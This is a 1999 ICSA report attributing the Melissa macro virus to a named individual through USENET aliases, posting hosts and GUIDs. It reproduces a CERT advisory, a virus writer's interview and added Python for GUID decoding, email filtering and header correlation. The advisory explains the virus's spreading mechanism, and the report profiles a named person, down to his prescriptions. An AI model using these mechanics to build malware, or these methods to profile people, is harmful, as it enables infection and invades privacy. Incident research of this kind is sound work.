ICSA Melissa Research Report

VicodinES/DL Smith virus writer

April 2, 1999


Executive Summary

Conclusions and Unresolved Questions


Conclusions
ICSA's analysts believe David L. SMITH is probably the virus writer VicodinES. We offer our analysis to help focus investigators; forensic examination of computers SMITH had access to may be useful in conjunction with it. Our analysis relies on USENET posts located by searching Dejanews, on our own data collected from the computer underground, and on analysis of the viruses involved. We recognize that the analysis is not conclusive and that it does not attribute the viruses to anyone with absolute confidence. It may, however, assist the finder of fact in establishing the "scene" SMITH was involved in. Presuming SMITH is VicodinES, he may be culpable for offenses in addition to those associated with the Melissa virus.
Roger Thompson, Director of Vendor Labs, has analyzed the Globally Unique Identifier (GUID) embedded in the Melissa macro virus and in other macro viruses that VicodinES has acknowledged authoring. The GUID is consistent with the same person authoring Melissa and other macro viruses such as Class.A.poppy. One caveat applies. Word 97 writes the GUID into a document when the document is created, and the GUID incorporates the Ethernet hardware address of the machine that created it, so a matching GUID ties the documents to the same machine (or to copies of the same original document), not directly to a person. The GUID match is therefore corroboration to be weighed with the other evidence below, not an identification on its own.
Our analysis of SMITH's and VicodinES's posts to USENET has found three chief nodes in common: posts to the group nj.test, an affinity for the Russian anti-virus program AVP, and promotion of a web site for a category of music, the Industrial Information Station.
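The GUID comparison described above can be reproduced in outline. The following Python, added here as an example and not part of ICSA's analysis or tooling, decodes version-1 GUIDs of the kind Word 97 stored in a document's property stream (_PID_GUID) into timestamp, clock sequence and node, groups documents that share a hardware node, and flags GUIDs whose node field is random rather than an adapter address (in which case a match means nothing). The GUID strings and document names are constructed for the example; the real Melissa and Class.A.poppy values are not reproduced in this report, and extracting the GUID from the OLE2 file is assumed to have been done beforehand.

```python
import uuid
from datetime import datetime, timedelta, timezone

# Constructed sample GUIDs. They are NOT the values from Melissa or from
# Class.A.poppy (this report does not reproduce those); they only have the
# shape of the version-1 GUIDs that CoCreateGuid() produced on Windows in
# 1997-99 and that Word 97 stored with a new document as _PID_GUID:
# 60-bit timestamp, 14-bit clock sequence, 48-bit node taken from the
# Ethernet adapter. A and B share a node; C does not; D has a random node.
SAMPLE_DOCS = {
    "sample_A.doc": "05a1a000-0c24-11d2-a1b3-026b1f4ac8e3",
    "sample_B.doc": "77eb9c00-dea7-11d2-9c77-026b1f4ac8e3",
    "sample_C.doc": "172ff800-e3ae-11d2-8f02-02a7d3e9c401",
    "sample_D.doc": "3e41c000-e3ae-11d2-b2e1-d7a8c10b5e93",
}

GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)  # RFC 4122 time origin


def mac_str(node: int) -> str:
    """Render the 48-bit node field as an IEEE 802 address."""
    return ":".join(f"{(node >> shift) & 0xff:02x}" for shift in range(40, -1, -8))


def decode_guid(text: str) -> dict:
    """Split a version-1 GUID into the fields relevant to document attribution."""
    u = uuid.UUID(text)
    if u.version != 1:
        raise ValueError(f"{text}: version {u.version} GUIDs carry no timestamp or node")
    # u.time counts 100 ns intervals since 1582-10-15 00:00:00 UTC.
    created = GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)
    # RFC 4122 section 4.5: a node that is not a real adapter address has the
    # multicast bit (low bit of the first octet) set. Such a GUID identifies
    # nothing beyond the document itself.
    hardware_node = not (u.node >> 40) & 0x01
    return {
        "created": created,
        "clock_seq": u.clock_seq,
        "node": mac_str(u.node),
        "hardware_node": hardware_node,
    }


def group_by_node(docs: dict) -> dict:
    """Group document names by node; a shared hardware node means the same machine."""
    groups = {}
    for name, guid in docs.items():
        info = decode_guid(guid)
        if info["hardware_node"]:
            groups.setdefault(info["node"], []).append(name)
    return {node: sorted(names) for node, names in groups.items()}


if __name__ == "__main__":
    for name, guid in SAMPLE_DOCS.items():
        info = decode_guid(guid)
        print(f"{name}: created {info['created']:%Y-%m-%d %H:%M} UTC  "
              f"node {info['node']}  hardware={info['hardware_node']}")
    for node, names in group_by_node(SAMPLE_DOCS).items():
        if len(names) > 1:
            print(f"shared machine {node}: {', '.join(names)}")
```

The timestamp is the creation time of the document as recorded by the machine's clock, so it also orders documents from the same machine; a clock sequence that changes between two GUIDs with the same node is consistent with a reboot or clock change in between, not with a different machine.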


Unresolved Questions


Records for at least four other America Online (AOL) screen names could be checked. SMITH appears to have posted to USENET groups from at least five different AOL accounts. According to press reports, at least one of these, skyroket@aol.com, was usurped from another, legitimate, AOL subscriber. For example, on 8/4/96 VicodinD@aol.com posted to alt.drugs a message in which he wrote that he was changing his screen name from PainfullD@aol.com, raising the question of what happened to the PainfullD account: was it illicit, and was it discovered and deleted by its legitimate owner?
SMITH's employer(s) should be interviewed to determine which client companies allowed SMITH access to their systems. To post to USENET, SMITH appears to have used systems owned by or registered to J.P. Morgan, AT&T and Hoffman-LaRoche, all listed as clients of CGS Computer Associates. Such use may violate 18 USC 1030 or similar state statutes, and these firms may have a civil interest in SMITH's use of their systems as well.
Records of SMITH's health care, specifically records of prescriptions for Vicodin ES, other pain killers and other prescription drugs, may provide circumstantial evidence that is incriminating when considered in context.


Melissa Virus
From CERT Advisory CA-99-04 (reproduced in full in Appendix 1):

Overview:
At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email attachments. The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites.
Our analysis of this macro virus indicates that human action (in the form of a user opening an infected Word document) is required for this virus to propagate. It is possible that under some mailer configurations, a user might automatically open an infected document received in the form of an email attachment. This macro virus is not known to exploit any new vulnerabilities. While the primary transport mechanism of this virus is via email, any way of transferring files can also propagate the virus.
Anti-virus software vendors have called this macro virus the Melissa macro or W97M_Melissa virus.
In addition to this advisory, please see the Melissa Virus FAQ (Frequently Asked Questions) document available at:
http://www.cert.org/tech_tips/Melissa_FAQ.html

I. Description of the Melissa Virus

The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment. The transport message has most frequently been reported to contain the following Subject header

Subject: Important Message From <name>

Where <name> is the full name of the user sending the message.

The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text.

Here is that document you asked for ... don't show anyone else ;-)

The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim.

When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled.

Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future.

The macro then checks to see if the registry key

"HKEY_Current_User\Software\Microsoft\Office\Melissa?"

has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message.

This virus can not send mail on systems running MacOS; however, the virus can be stored on MacOS.

Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document.

The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see:

http://www.microsoft.com/security/bulletins/ms99-002.asp

Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor.

If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at:

http://www.cert.org/tech_tips/incident_reporting.html

[end of excerpt from CERT Advisory; the full text, including the Impact and Solutions sections, is reproduced in Appendix 1]
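The transport signature described in the excerpt (the Subject prefix, the fixed body text, and an application/msword part) is what the MTA-level filtering recommended in the advisory's Solutions section (Appendix 1) keys on. The following Python, added as an example and not code from ICSA, CERT or sendmail.com, builds a few constructed messages in that shape and classifies them. It deliberately does not require the attachment to be named list.doc, since the advisory notes that victims' own documents may be sent instead; all sender, recipient and document content is constructed.

```python
import email
from email import policy
from email.message import EmailMessage

# Transport signature from the CERT advisory quoted above.
SUBJECT_PREFIX = "Important Message From "
BODY_TEXT = "Here is that document you asked for ... don't show anyone else ;-)"

# Constructed stand-in for a Word 97 binary document: the OLE2 compound-file
# magic followed by filler. It is not a real document and carries no macro.
FAKE_DOC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56


def build_sample(subject, body, doc_name=None):
    """Build a constructed test message in the shape the advisory describes."""
    msg = EmailMessage()
    msg["From"] = "jane.doe@example.com"      # constructed sender
    msg["To"] = "first50@example.org"          # constructed recipient
    msg["Subject"] = subject
    msg.set_content(body)                      # text/plain part
    if doc_name is not None:                   # application/msword part
        msg.add_attachment(FAKE_DOC, maintype="application", subtype="msword",
                           filename=doc_name)
    return msg.as_bytes()


def classify(raw: bytes) -> dict:
    """Return which parts of the Melissa transport signature a message matches."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    texts, docs = [], []
    for part in msg.walk():
        ctype = part.get_content_type()
        name = part.get_filename() or ""
        if ctype == "text/plain":
            texts.append(part.get_content())
        elif ctype == "application/msword" or name.lower().endswith(".doc"):
            docs.append(name or "<unnamed>")
    hits = []
    if subject.startswith(SUBJECT_PREFIX):
        hits.append("subject")
    if any(BODY_TEXT in t for t in texts):
        hits.append("body")
    if docs:
        hits.append("word-attachment")
    # All three together is the signature. The attachment name is deliberately
    # not part of it: list.doc was only the first name seen, and the virus may
    # send the victim's own current document instead.
    verdict = "block" if len(hits) == 3 else "suspect" if len(hits) == 2 else "pass"
    return {"subject": subject, "attachments": docs, "hits": hits, "verdict": verdict}


# Constructed samples (not captured Melissa traffic).
SAMPLES = {
    "list.doc":   build_sample(SUBJECT_PREFIX + "Jane Doe", BODY_TEXT, "list.doc"),
    "victim doc": build_sample(SUBJECT_PREFIX + "Jane Doe", BODY_TEXT, "q1_budget.doc"),
    "hr memo":    build_sample(SUBJECT_PREFIX + "HR", "Please read the attached policy.", "policy.doc"),
    "lunch":      build_sample("Re: lunch", "See you at noon.", None),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        r = classify(raw)
        print(f"{label:10} {r['verdict']:7} hits={r['hits']} attachments={r['attachments']}")
```

A "suspect" verdict (two of three indicators) is worth quarantining for review rather than dropping, because a legitimate "Important Message From ..." subject with a Word attachment is common; the fixed body line is the discriminating element. Content-based filtering of this kind stops only the unmodified strain, so it complements, and does not replace, disabling macros and updating scanners as the advisory recommends.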

VicodinES


Sequence:


VicodinES@aol.com starts posting to rec.music.industrial, and about drugs, in April 95
Drlortab@aol.com starts posting to rec.music.industrial in March 96
Painfulld@aol.com makes four posts in July 96 to rec.music.industrial and alt.drugs and changes his address to vicodind@aol.com
Vicodini@aol.com makes two posts in Sep 96 to rec.music.industrial
Dlsmith@monmouth.com posts to sci.med.pharmacy in Feb 97, followed by rec.music.industrial in July 97
Doug Winterspoon starts posting to alt.comp.virus in Sep 97
On 10/18/97 and 10/19/97 Ane@tnn.com, Vic@tnn.com and Doug Winterspoon all post to nj.test
Vic@klonopin.com posts on 10/18/97 to alt.comp.virus
On 12/25/97 and 12/28/97 skyroket@aol.com posts virus-infected files to porn groups
On 2/4/98 Vic@bite-me.org starts posting to alt.comp.virus
On 3/11/98 xanax.smith@feedme starts posting to alt.comp.virus
Vicodines@my-dejanew.com starts posting to virus groups on 6/25/98
Ibuprofen@my-dejanews.com posts to virus groups from 10/15/98 to 12/23/98 from IPs that appear to belong to corporate clients of his employer


VDAT/Cicatrix Interview (August 97)


An August 1997 "interview" of the virus author VicodinES by "Cicatrix", published by the virus exchange group VDAT, reveals several details that point towards David L. SMITH. VicodinES states he was 14 or 15 years of age when his father purchased a TI-99/4A computer, and places that time at "like 1982? Maybe a bit later." These computers were popular in the early to mid-80's, making VicodinES' year of birth somewhere between 1967 and 1970 and his present age about 30. He became involved in the virus scene because he was bored and high on prescription painkillers.
When asked why he names his viruses "poppy," he replies, "They all end in .Poppy because I am a pill-head and all the good pills come from the poppy plant!"
He admits to being part of "The Narkotic Network," which he says has three members; the other two he names are Klonopin.Jones and Fastin.Blee.
When asked how he came by the handle "VicodinES," he answered, "VicodinES is the name for a painkiller here in the US. It's actually Vicodin Extra Strength. I love those little fucking pills so I took that name. It's just Hydrocodone and Tylenol. Anyway I was very high on the little bastards when I decided to start writing virii so I thought it was appropriate."
In the interview, he states he prefers the anti-virus program AVP.
He gives the e-mail address "vcru@hotmail.com". A check of Dejanews revealed 33 posts with this address, all to alt.binaries.pictures.erotica under the name Dan Johnson. Our analysis does not treat this as a significant alias with regard to viruses.
In the interview he also names several entities that recur elsewhere in this analysis, specifically: Monkey, Mousey and The Woobie, Klonopin Jones and Fastin.Blee.


Klonopin.Jones


Klonopin Jones (jones@thermal1.fiu.edu) posted to rec.music.industrial on 10/5/95 with mailer settings including "Organization: Industrial Information Station" and the name "Kinzy Jones Jr." at Florida International University. N.B. Klonopin is a brand-name anti-anxiety drug (clonazepam).
VicodinES used the alias vic@klonopin.com to post to alt.comp.virus on 10/18/97. Klonopin.com is a domain registered to Hoffman-LaRoche. Hoffman-LaRoche is listed as a client on a web page of David L. SMITH's employer, CGS Computer Associates. If this address was genuine rather than simply typed into the news client's From field, it may indicate SMITH was using Hoffman-LaRoche systems illicitly; the NNTP-Posting-Host of that post is the header that would settle the question.


Industrial Information Station & rec.music.industrial


Painfull D (painfulld@aol.com) posted to rec.music.industrial on 7/11/96 with the following text:

Three cats :

Monkey (calico female) - likes ambient music - mostly Delerium
Mousey (siamese male) - likes hard fast ebm and beating up on monkey
Woobie (persian / siamese male) - he's deaf so he has no idea what music is....poor woobie

[d]
The IIS : http://www.fiu.edu:80/~wjones01/kd.html

ps yes I named my cats stupid names but they fit - what else could I do? :)

Then on 8/4/96, Vicodin D (vicodind@aol.com) posted to alt.drugs with the following text:

[d]

Painfull D --> is now Vicodin D (aol problems)

VicodinES (vicodines@aol.com) posted 36 times to rec.music.industrial, and stated on 1995/04/16 that he lives in Florida.


Posts to nj.test


On 10/17-10/18/97 only four different senders posted to the USENET group nj.test. Three of these four are associated with David SMITH/VicodinES. On 10/17/97, Anexia (Ane@tnn.com) and VicodinES (Vic@tnn.com) posted test messages. On 10/18/97, VicodinES posted again, as did Doug Winterspoon (nomail@nospam.com). The only other poster to this group was Jack (jack@REMOVE-TO-REPLY.superlink.net), whom we do not believe is related to the Melissa author.


Doug Winterspoon


Doug Winterspoon, who used the email addresses not@no.com and nomail@nospam.com, was a prolific poster to alt.comp.virus. On 12/7/97 he posted to alt.art.marketplace and in the text of the message asked that replies be sent to the dlsmith@monmouth.com address. This address coincides with an address believed to be David L. SMITH's.


DL Smith


DLSmith, who used the email addresses dlsmith@anti.spam.monmouth.com, dlsmith@monmouth.com, and dlsmith@monmouth.com.remove.this on USENET, has an affinity for the computer game Ultima Online, industrial music, drugs and computer viruses. During the period 2/4/99 to 3/18/99, using the address dlsmith@anti.spam.monmouth.com, he posted from a client that appears to be inside AT&T Labs Research, Florham Park, NJ, as indicated by both the "Organization" header and the NNTP-Posting-Host. AT&T is a client of SMITH's employer.


Ibuprofen


Alt.TV.simpsons post
On 10/26/98, this identity posted to alt.tv.simpsons. This is the only link from SMITH/VicodinES to The Simpsons TV show, which is referenced within the Melissa virus (the "Kwyjibo" registry value and the Scrabble-score message quoted in the CERT advisory both come from a Simpsons episode).
Signed a message Doug W
On 10/20/98, this identity posted to microsoft.public.scripting.vbscript and signed the message "Doug W", linking this identity to Doug Winterspoon.
IP addresses for the clients posting with this identity belong to CGS Computer Associates' Clients
Of the seven posts using this identity, two appear to have come from clients with IP addresses assigned to Monmouth Internet. Four IP addresses are assigned to J.P. Morgan, listed on http://www.cgscai.com/cgs/clients.asp as a client of CGS Computer Associates. The final IP address is assigned to Cable & Wireless; we know of no association between SMITH and C&W.


Sky Roket

This identity posted macro-virus-infected files to pornography newsgroups on 12/25/97 and 12/28/97, before Melissa.


Vicodin D and Painful D at AOL are the same person

Post made 8/4/96 cited AOL problems


Vic@klonopin.com may be Hoffman-LaRoche's system
On 10/18/97 this identity posted once to alt.comp.virus. Klonopin.com is registered to Hoffman-LaRoche, another of CGS Computer Associates' clients.


Multiple aliases and clients


SMITH seldom posted to USENET under more than one identity on any given day. For those posts that originated from somewhere other than America Online, SMITH's preferred news client appears to have been Netscape Navigator/Communicator. The pattern of changes to his alias is consistent with choosing an alias for a day or some other period and not changing it mid-session. Changing the identity in Netscape is relatively straightforward, but sufficiently involved that making frequent changes would be time-consuming.
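The header correlations used throughout this section (NNTP-Posting-Host against netblock ownership, the "Organization" header, and alias changes by day) can be mechanized over a set of retrieved posts. The following Python, added as an example and not part of ICSA's method or tooling, parses constructed USENET header blocks, maps each posting host to a netblock owner through an invented allocation table (RFC 5737 documentation ranges standing in for whois data), and reports which aliases shared a posting host, which appeared from which organization's address space, and on which days more than one alias posted. Only the alias strings come from this report; every date, host and owner mapping is constructed.

```python
import email
import ipaddress
from collections import defaultdict
from email.utils import parseaddr, parsedate_to_datetime

# Constructed allocation table standing in for whois/ARIN lookups. The ranges
# are RFC 5737 documentation blocks; the owner names follow the report's
# narrative, but the mapping itself is invented for this example.
NETBLOCKS = {
    "192.0.2.0/24":    "Monmouth Internet",
    "198.51.100.0/24": "J.P. Morgan",
    "203.0.113.0/24":  "AT&T Labs Research",
}

# Constructed posting headers. The From aliases are ones this report
# discusses; every date, host and Organization value is invented.
RAW_POSTS = [
    "From: Vic@tnn.com\nNewsgroups: nj.test\n"
    "Date: Sat, 18 Oct 1997 09:12:00 -0400\nNNTP-Posting-Host: 192.0.2.77\n\ntest\n",
    "From: \"Doug Winterspoon\" <nomail@nospam.com>\nNewsgroups: nj.test\n"
    "Date: Sat, 18 Oct 1997 09:30:00 -0400\nNNTP-Posting-Host: 192.0.2.77\n\ntest\n",
    "From: ibuprofen@my-dejanews.com\nNewsgroups: microsoft.public.scripting.vbscript\n"
    "Date: Tue, 20 Oct 1998 10:15:00 -0400\nOrganization: Deja News\n"
    "NNTP-Posting-Host: 198.51.100.23\n\n(body omitted)\n",
    "From: ibuprofen@my-dejanews.com\nNewsgroups: alt.tv.simpsons\n"
    "Date: Mon, 26 Oct 1998 21:40:00 -0500\nOrganization: Deja News\n"
    "NNTP-Posting-Host: 192.0.2.77\n\n(body omitted)\n",
    "From: dlsmith@anti.spam.monmouth.com\nNewsgroups: rec.music.industrial\n"
    "Date: Thu, 4 Feb 1999 13:05:00 -0500\nOrganization: AT&T Labs Research\n"
    "NNTP-Posting-Host: 203.0.113.8\n\n(body omitted)\n",
]


def owner_of(host: str) -> str:
    """Map a posting host to the organization holding its netblock."""
    addr = ipaddress.ip_address(host)
    for block, owner in NETBLOCKS.items():
        if addr in ipaddress.ip_network(block):
            return owner
    return "unknown"


def parse_post(raw: str) -> dict:
    msg = email.message_from_string(raw)   # RFC 1036 headers parse like RFC 822
    _display, addr = parseaddr(msg["From"])
    host = msg["NNTP-Posting-Host"]
    return {
        "alias": addr.lower(),
        "day": parsedate_to_datetime(msg["Date"]).date(),  # poster's local date
        "groups": [g.strip() for g in msg["Newsgroups"].split(",")],
        "host": host,
        "owner": owner_of(host),
        "organization": msg.get("Organization", ""),
    }


POSTS = [parse_post(r) for r in RAW_POSTS]


def days_with_multiple_aliases(posts):
    """Days on which more than one alias posted: exceptions to the one-alias-a-day pattern."""
    days = defaultdict(set)
    for p in posts:
        days[p["day"]].add(p["alias"])
    return sorted(day for day, aliases in days.items() if len(aliases) > 1)


def aliases_by_host(posts):
    """Aliases seen through the same NNTP-Posting-Host: the strongest header-level link."""
    hosts = defaultdict(set)
    for p in posts:
        hosts[p["host"]].add(p["alias"])
    return {h: sorted(a) for h, a in hosts.items()}


def aliases_by_owner(posts):
    """Which identities appeared from which organization's address space."""
    owners = defaultdict(set)
    for p in posts:
        owners[p["owner"]].add(p["alias"])
    return {o: sorted(a) for o, a in owners.items()}


if __name__ == "__main__":
    print("multi-alias days:", [d.isoformat() for d in days_with_multiple_aliases(POSTS)])
    for host, aliases in aliases_by_host(POSTS).items():
        print(f"{host:16} {owner_of(host):20} {', '.join(aliases)}")
```

The From header is whatever the poster typed into the client, so `aliases_by_host` carries the evidentiary weight: it links identities through a value the news server recorded, while the "Organization" header is client-supplied and only corroborates. Dial-up pools complicate the host link (many subscribers share one address over time), which is why the report weighs the corporate netblocks more heavily than the Monmouth Internet ones.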


Appendixes


Appendix 1 CERT Advisory
CERT Advisory CA-99-04-Melissa-Macro-Virus

Original issue date: Saturday March 27 1999
Last Revised: Saturday March 27, 1999

Systems Affected

* Machines with Microsoft Word 97 or Word 2000
* Any mail handling system could experience performance problems or a denial of service as a result of the propagation of this macro virus.

Overview

At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email attachments. The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites.

Our analysis of this macro virus indicates that human action (in the form of a user opening an infected Word document) is required for this virus to propagate. It is possible that under some mailer configurations, a user might automatically open an infected document received in the form of an email attachment. This macro virus is not known to exploit any new vulnerabilities. While the primary transport mechanism of this virus is via email, any way of transferring files can also propagate the virus.

Anti-virus software vendors have called this macro virus the Melissa macro or W97M_Melissa virus.

I. Description

The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment. The transport message has most frequently been reported to contain the following Subject header

Subject: Important Message From <name>

Where <name> is the full name of the user sending the message.

The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text.

Here is that document you asked for ... don't show anyone else ;-)

The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim.

When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled.

Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future.

The macro then checks to see if the registry key

"HKEY_Current_User\Software\Microsoft\Office\Melissa?"

has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message.

Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document.

The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see:

http://www.microsoft.com/security/bulletins/ms99-002.asp

Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor.

If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at:

http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

* Users who open an infected document in Word97 or Word2000 with macros enabled will infect the Normal.dot template causing any documents referencing this template to be infected with this macro virus. If the infected document is opened by another user, the document, including the macro virus, will propagate. Note that this could cause the user's document to be propagated instead of the original document, and thereby leak sensitive information.

* Indirectly, this virus could cause a denial of service on mail servers. Many large sites have reported performance problems with their mail servers as a result of the propagation of this virus.

III. Solutions

* Block messages with the signature of this virus at your mail transfer agents.

With Sendmail

Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the follow URL:

ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt

* Utilize virus scanners

Most virus scanning tools will detect and clean macro viruses. In order to detect and clean current viruses you must keep your scanning tools up to date with the latest definition files.

+ McAfee / Network Associates

http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

+ Symantec

http://www.symantec.com/avcenter/venc/data/mailissa.html

+ Trend Micro

http://housecall.antivirus.com/smex_housecall/technotes.html

* Encourage users at your site to disable macros in Microsoft Word

Notify all of your users of the problem and encourage them to disable macros in Word. You may also wish to encourage users to disable macros in any product that contains a macro language as this sort of problem is not limited to Microsoft Word.

In Word97 you can disable automatic macro execution (click Tools/Options/General then turn on the 'Macro virus protection' checkbox). In Word2000 macro execution is controlled by a security level variable similar to Internet Explorer (click on Tools/Macro/Security and choose High, Medium, or Low). In that case, 'High' silently ignores the VBA code, Medium prompts in the way Word97 does to let you enable or disable the VBA code, and 'Low' just runs it.

Word2000 supports Authenticode on the VB code. In the 'High' setting you can specify sites that you trust and code from those sites will run.

* General protection from Word Macro Viruses

For information about macro viruses in general, we encourage you to review the document "Free Macro AntiVirus Techniques" by Chengi Jimmy Kuo which is available at:

http://www.nai.com/services/support/vr/free.asp

Acknowledgements

We would like to thank Jimmy Kuo of Network Associates, Eric Allman and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and Jason Garms and Karan Khanna of Microsoft for providing information used in this advisory.

Additionally we would like to thank the many sites who reported this activity.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site http://www.cert.org/.

To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University.

Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office
______________________________________________________________________

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________

Revision History

Appendix 2 VicodinES-Cicatrix Interview


Interview with VicodinES (1997) (emphasis added by ICSA)

by Cicatrix

[IS/Recon Note: from an HTML publication produced by the computer virus exchange group VDAT, August 1997. Boldface emphasis is ours, indicating significant data in the interview.]

How did you start out in computers?

I was 14 or 15 and my dad purchased a TI-99 4/A and I started teaching myself BASIC. Programs were loaded with a cassette tape :) A buddy of mine had one with a modem and we used to call all these bbs's long distance on stolen calling card numbers. We would read sex stories, curse out people on "the war boards" and download files on how to make bombs and such. The time-frame here was like 1982? Maybe a bit later. I also ran a small bbs for a time called "The Electric Death BBS" on a very early Compaq Luggable (fucking thing must have been 30 pounds) ... it was around the same time.

How and when did you start out in the virus scene?

Hmmm, honestly I was bored, really high on prescription painkillers (purchased not prescribed) and I decided to do some assembly programming again.

Have you written viruses? If so which would you like to take credit for?

Yes I write virii and I don't want to take any credit for the massively hacked virii that I stuck a bunch of AOL'ers with. Beta's are a bitch! Ummm I will take credit for anything that infected your system, even if I didn't program it. If it annoyed you then I want credit for it :)

How do you name your viruses?

They all end in .Poppy because I am a pill-head and all the good pills come from the poppy plant! Why? Why not? They all get their first names by accident.

Which programming languages do you know?

I took COBOL in high school but I forgot most of it. I know Modula and Pascal. I also do ok in Assembly and C++. I am working on my Visual C++ skills right now because I have a really good idea for my next virus ;)

What programming language do you like using the most?

They all suck!

Are you a member of a VX group?

I am part of The Narkotic Network. There is just three of us.

Which AV software do you like/respect the most? Which the least?

I use AVP the most so I guess I like that the best. I have a copy of every AV product on my hd so I can keep track of what programs can find what virii and to cross check my work. I don't really hate any of them - I don't have emotional attachments to any AV products.... I take that back I LOVE the ones that still can find my virii!

What are your goals (VX wise)?

To annoy countless users worldwide.

What is your view on the continuous 'war' between VX and AV.

Don't really know much about it.

Where did you get you handle? What does it mean?

VicodinES is the name for a painkiller here in the US. It's actually Vicodin Extra Strength. I love those little fucking pills so I took that name. It's just Hydrocodone and Tylenol. Anyway I was very high on the little bastards when I decided to start writing virii so I thought it was appropriate.

